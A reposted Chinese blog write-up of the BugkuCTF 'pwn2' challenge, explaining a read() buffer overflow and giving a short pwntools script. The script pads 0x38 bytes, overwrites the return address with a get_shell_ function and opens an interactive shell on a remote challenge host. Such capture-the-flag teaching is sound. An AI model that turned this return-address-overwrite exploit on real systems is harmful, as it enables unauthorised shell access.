bugke pwn2

其他 2019-06-05 23:18:09 阅读次数: 0

根据伪代码可以看到read函数存在溢出

存在一个后面那就直接覆盖返回地址就完事了

从ida很直观看出s的偏移为0x30

所以到到返回地址的距离就是0x30+0x8

from pwn import *
#p = process('./pwn2')
p=remote('114.116.54.89','10003')
elf = ELF('./pwn2')
flag = elf.symbols['get_shell_']
payload = 'a'*(0x8+0x30)+p64(flag)
p.recvline()
p.sendline(payload)
p.interactive()

猜你喜欢

转载自www.cnblogs.com/haozhizhi/p/10982400.html

bugke pwn2

[WP]BugkuCtf - pwn2

X10sec pwn2

pwn-pwn2

pwn-ROP(2)

pwn的学习2 coliision

pwn stack2

ctf pwn基础-2

BugkuCtf-pwn2-exp

NSCTF 2017-pwn2

buuctf --pwn part2

pwn之cgpwn2

pwn2_sctf_2016

pwn

pwn入门题x2

(Jarvis Oj)(Pwn) level2

18.9.16 PWN2----Stack Overflow

pwn学习笔记-ret2text

nsctf_online_2019_pwn2

pwn之ret2libc

HGAME pwn ROP_LEVEL2

BJDCTF 2nd pwn Writeup

攻防世界—pwn—level2

【BUUCTF - PWN】jarvisoj_level2

【BUUCTF - PWN】ciscn_2019_en_2

攻防世界—pwn—cgpwn2

pwn学习之ret2libc

BUUCTF-PWN刷题记录-2

BUUCTF-pwn2_sctf_2016

BJDCTF_2nd PWN复盘

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)